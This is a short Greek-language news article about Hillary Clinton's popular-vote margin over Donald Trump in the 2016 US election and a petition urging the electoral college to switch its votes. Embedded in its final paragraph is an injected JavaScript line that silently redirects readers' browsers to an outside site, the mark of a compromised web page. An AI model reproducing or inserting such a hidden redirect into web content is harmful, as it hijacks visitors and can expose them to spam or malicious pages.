Ρεκορ Χίλαρι: Πήρε τις περισσότερες ψήφους από κάθε άλλο χαμένο υποψήφιο στην ιστορία

0
2

Η υποψήφια των Δημοκρατικών αναμένεται με την ολοκλήρωση της καταμέτρησης των ψήφων να κερδίσει τουλάχιστον 2 εκατ. ψήφους περισσότερες σε σχέση με τον νικητή των εκλογών, Ντόναλντ Τραμπ.

Η διαφορά είναι η μεγαλύτερη που έχει καταγραφεί στην ιστορία ενός υποψηφίου που έχασε τις εκλογές, όμως δεν είναι μεγαλύτερη από τη διαφορά ψήφων που είχαν καταφέρει ο Κλίντον και ο Ομπάμα.

Η Κλίντον έχει ήδη κερδίσει ένα εκατομμύριο περισσότερες ψήφους από τον Ντόναλντ Τραμπ, περισσότερες από αυτές που είχε κερδίσει ο Κέννεντι ο οποίος θεωρείται ο πιο δημοφιλής πρόεδρος στην ιστορία των ΗΠΑ.

Περισσότεροι από 4,3 εκατ. Αμερικανοί έχουν υπογράψει έκκληση με την οποία καλούν το εκλεκτορικό σώμα να αλλάξει την απόφασή του και να ψηφίσουν υπέρ της Κλίντον, καθώς όπως τονίζουν ο Τραμπ δεν είναι ικανός να ανταποκριθεί στις απαιτήσεις του αξιώματος.

Οι αμερικανικές εκλογές κρίνονται από τον αριθμό των εκλεκτόρων που κερδίζει κάθε υποψήφιος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here